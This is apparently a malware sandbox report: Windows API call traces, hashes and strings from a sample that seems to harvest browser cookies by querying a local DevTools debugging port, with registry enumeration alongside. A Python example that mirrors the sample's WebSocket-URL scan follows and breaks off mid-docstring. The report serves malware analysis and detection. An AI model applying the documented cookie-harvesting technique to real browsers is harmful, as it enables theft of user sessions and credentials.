                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FAF2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAF53
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FAF8F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FAF99
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAFBF
                            • lstrlen.KERNEL32(00000000), ref: 008FAFD5
                            • lstrcpy.KERNEL32(00000000,012FF540), ref: 008FB008
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID:
                            • API String ID: 2762123234-0
                            • Opcode ID: 1501078f068346b5b3424da4a9098395edbff3ac2b0cd5edaba5e53dc7b4eab7
                            • Instruction ID: e27f15733b94ff7413e1a20bf2b7fb77d374035eaa5dd7359314f99d0b0740a8
                            • Opcode Fuzzy Hash: 1501078f068346b5b3424da4a9098395edbff3ac2b0cd5edaba5e53dc7b4eab7
                            • Instruction Fuzzy Hash: 08B178B191066AABCB25EB78CC48ABEB7B9FF41310F444424B909E7251DF74DE41CB92
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00901A1F
                            • lstrlen.KERNEL32(012E6CF0), ref: 00901A30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A57
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901A62
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A91
                            • lstrlen.KERNEL32(00914FA4), ref: 00901AA3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AC4
                            • lstrcat.KERNEL32(00000000,00914FA4), ref: 00901AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AFF
                            • lstrlen.KERNEL32(012E6D00), ref: 00901B15
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901B3C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901B47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901B76
                            • lstrlen.KERNEL32(00914FA4), ref: 00901B88
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901BA9
                            • lstrcat.KERNEL32(00000000,00914FA4), ref: 00901BB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901BE4
                            • lstrlen.KERNEL32(012E6D30), ref: 00901BFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C21
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901C2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C5B
                            • lstrlen.KERNEL32(012E6D40), ref: 00901C71
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C98
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901CA3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901CD2
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 2417d0fa30d22ec7f4f86c100b486aae61585d8224b489d4e72ae5fee6414fa0
                            • Instruction ID: 3247218bde3693bc514ee6574d60d20fdd83ae493667ac1f4cc82c6bdc5d8dfa
                            • Opcode Fuzzy Hash: 2417d0fa30d22ec7f4f86c100b486aae61585d8224b489d4e72ae5fee6414fa0
                            • Instruction Fuzzy Hash: B2914DB5601743AFDB20AFBADC88E56B7ECFF14304B548828A886D3291DF74D941CB60
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F48F3
                            • LocalAlloc.KERNEL32(00000040,?), ref: 008F4925
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4972
                            • lstrlen.KERNEL32(00914B68), ref: 008F497D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F499A
                            • lstrcat.KERNEL32(00000000,00914B68), ref: 008F49A6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F49CB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F49F8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4A03
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4A2A
                            • StrStrA.SHLWAPI(?,00000000), ref: 008F4A3C
                            • lstrlen.KERNEL32(?), ref: 008F4A50
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4A91
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4B18
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4B41
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4B6A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4B90
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4BBD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: 0d6def5ed900ec0ea2cd589e262e5996f577ca2859f703fffaf232feb6766478
                            • Instruction ID: 3ee99a1f95107fecd5cfbf261551331177b55b5964b2fc482541a36e1a6c7938
                            • Opcode Fuzzy Hash: 0d6def5ed900ec0ea2cd589e262e5996f577ca2859f703fffaf232feb6766478
                            • Instruction Fuzzy Hash: 7AB1C372A1125A9BCB21EFB9D845EAF7BB8FF44310F045129F946E7212DB70ED018B91
                            APIs
                              • Part of subcall function 008E90C0: InternetOpenA.WININET(0090CFF4,00000001,00000000,00000000,00000000), ref: 008E90DF
                              • Part of subcall function 008E90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008E90FC
                              • Part of subcall function 008E90C0: InternetCloseHandle.WININET(00000000), ref: 008E9109
                            • strlen.MSVCRT ref: 008E92E1
                            • strlen.MSVCRT ref: 008E92FA
                              • Part of subcall function 008E8980: std::_Xinvalid_argument.LIBCPMT ref: 008E8996
                            • strlen.MSVCRT ref: 008E9399
                            • strlen.MSVCRT ref: 008E93E6
                            • lstrcat.KERNEL32(?,cookies), ref: 008E9547
                            • lstrcat.KERNEL32(?,0091179C), ref: 008E9559
                            • lstrcat.KERNEL32(?,?), ref: 008E956A
                            • lstrcat.KERNEL32(?,00914BA0), ref: 008E957C
                            • lstrcat.KERNEL32(?,?), ref: 008E958D
                            • lstrcat.KERNEL32(?,.txt), ref: 008E959F
                            • lstrlen.KERNEL32(?), ref: 008E95B6
                            • lstrlen.KERNEL32(?), ref: 008E95DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E9614
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: f3bd3dc0b6e0ab670205360f2fd2611bc152a81e8a4bd93a18151e310a5386f4
                            • Instruction ID: 867927a7d691dfb222524409d3e9734447cdb91f6864128a8f2d2f281e119af4
                            • Opcode Fuzzy Hash: f3bd3dc0b6e0ab670205360f2fd2611bc152a81e8a4bd93a18151e310a5386f4
                            • Instruction Fuzzy Hash: D4E12371E1025CEBDF10DFA9D880ADEBBB5FF49304F1084A9E549E7281DB709A85CB91
                            APIs
                            • memset.MSVCRT ref: 008FDB91
                            • memset.MSVCRT ref: 008FDBA3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FDBCB
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FDBFE
                            • lstrcat.KERNEL32(?,00000000), ref: 008FDC0C
                            • lstrcat.KERNEL32(?,012FF768), ref: 008FDC26
                            • lstrcat.KERNEL32(?,?), ref: 008FDC3A
                            • lstrcat.KERNEL32(?,012FDFB0), ref: 008FDC4E
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FDC7E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008FDC85
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FDCEE
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: 54fd6b4101e54fcaff21c8b2bbc925d73c6c920cdd7f735f680c634394625b48
                            • Instruction ID: 5ef5ed515bcfbe503b6cf3b01cc815a057f707242bdb9d3eea3c45608abe5b96
                            • Opcode Fuzzy Hash: 54fd6b4101e54fcaff21c8b2bbc925d73c6c920cdd7f735f680c634394625b48
                            • Instruction Fuzzy Hash: 13B18EB2D10299AFCB10EFB4DC989EE77B9FF48300F548564EA05E7241DA709E45CB91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EB330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008EB3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB3D9
                            • lstrlen.KERNEL32(00914C54), ref: 008EB450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB474
                            • lstrcat.KERNEL32(00000000,00914C54), ref: 008EB480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB4A9
                            • lstrlen.KERNEL32(00000000), ref: 008EB52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008EB55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB587
                            • lstrlen.KERNEL32(00914ADC), ref: 008EB5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB622
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008EB62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB65E
                            • lstrlen.KERNEL32(?), ref: 008EB767
                            • lstrlen.KERNEL32(?), ref: 008EB776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB79E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 398e9dab436d5cb63658e706d102519065b163e1bbd5ef0612fd4865bea8009b
                            • Instruction ID: fe3d63e495b8a156b0c62a4d11bb0724839c95227296352aea4fd7266f45e2a9
                            • Opcode Fuzzy Hash: 398e9dab436d5cb63658e706d102519065b163e1bbd5ef0612fd4865bea8009b
                            • Instruction Fuzzy Hash: C3029330A01285DFCB25DF6AD949AABB7F5FF46714F188069E409DB261DB71DC82CB80
                            APIs
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            • RegOpenKeyExA.ADVAPI32(?,012F8FA0,00000000,00020019,?), ref: 0090398D
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 009039C7
                            • wsprintfA.USER32 ref: 009039F2
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00903A10
                            • RegCloseKey.ADVAPI32(?), ref: 00903A1E
                            • RegCloseKey.ADVAPI32(?), ref: 00903A28
                            • RegQueryValueExA.ADVAPI32(?,012FF630,00000000,000F003F,?,?), ref: 00903A71
                            • lstrlen.KERNEL32(?), ref: 00903A86
                            • RegQueryValueExA.ADVAPI32(?,012FF5B8,00000000,000F003F,?,00000400), ref: 00903AF7
                            • RegCloseKey.ADVAPI32(?), ref: 00903B42
                            • RegCloseKey.ADVAPI32(?), ref: 00903B59
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: 989ab7ddaaffb0df92ce28c4db6af4d3d1ce8eecd9f74a678227caacc0b35ba1
                            • Instruction ID: 2b59bebc75114a32e53c17036cc247f777b2e486249904799a65d34ce2141943
                            • Opcode Fuzzy Hash: 989ab7ddaaffb0df92ce28c4db6af4d3d1ce8eecd9f74a678227caacc0b35ba1
                            • Instruction Fuzzy Hash: 7C919E72D002589FCB10DFA4DC84AEEB7BDFB88314F15C569E509A7291DB31AE46CB90
                            APIs
                            • InternetOpenA.WININET(0090CFF4,00000001,00000000,00000000,00000000), ref: 008E90DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008E90FC
                            • InternetCloseHandle.WININET(00000000), ref: 008E9109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 008E9166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 008E9197
                            • InternetCloseHandle.WININET(00000000), ref: 008E91A2
                            • InternetCloseHandle.WININET(00000000), ref: 008E91A9
                            • strlen.MSVCRT ref: 008E91BA
                            • strlen.MSVCRT ref: 008E91ED
                            • strlen.MSVCRT ref: 008E922E
                            • strlen.MSVCRT ref: 008E924C
                              • Part of subcall function 008E8980: std::_Xinvalid_argument.LIBCPMT ref: 008E8996
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 1c07c382440a3c06ac998c8c0bf60c28750d1f634380730be5e80b679900f3fb
                            • Instruction ID: 00639766d1565f34e3b0ee2d5a4d1b4b8ea55f473062fecd9b6944c886b7d0e9
                            • Opcode Fuzzy Hash: 1c07c382440a3c06ac998c8c0bf60c28750d1f634380730be5e80b679900f3fb
                            • Instruction Fuzzy Hash: 4A51F771740249ABDB20DBA8DC45BEEB7F9EF88710F140569F505E3280DBB4DA4587A2
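The function above fetches http://localhost:9229/json with WinINet and then walks the response with strlen-based scanning for the markers "webSocketDebuggerUrl": and "ws://, which is the layout of a DevTools discovery response (the sibling function that carries the /devtools and cookies strings consumes what this one finds). The Python below is an added example, not code from the sample or from this report: it reproduces that marker scan on a constructed discovery response so an analyst can see exactly which values the sample harvests, puts a strict JSON parse beside it, and adds a small host check that asks the same endpoint whether a debugger is listening. The sample targets, the page/service_worker split and the probe helper are assumptions; the report only shows the URL, the two markers and the port.

```python
"""DevTools discovery (/json) parsing, mirroring the marker scan seen in the
listed function. Added example, not the sample's own code."""
import json
import urllib.request
from urllib.error import URLError

# Constructed sample response (assumption: one browser tab and one extension
# worker), shaped like the JSON array a DevTools discovery endpoint returns.
SAMPLE_JSON = """[
  {"description": "", "id": "A1B2", "title": "Example tab", "type": "page",
   "url": "https://example.com/",
   "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/A1B2"},
  {"description": "", "id": "C3D4", "title": "background",
   "type": "service_worker", "url": "chrome-extension://x/bg.js",
   "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/C3D4"}
]"""

# The two literals the report lists for this function.
KEY_MARKER = '"webSocketDebuggerUrl":'
WS_MARKER = '"ws://'


def scan_ws_urls(body: str) -> list:
    """Marker-based scan in the style of the listed function: find the key,
    then the quoted ws:// value after it, and cut at the closing quote.
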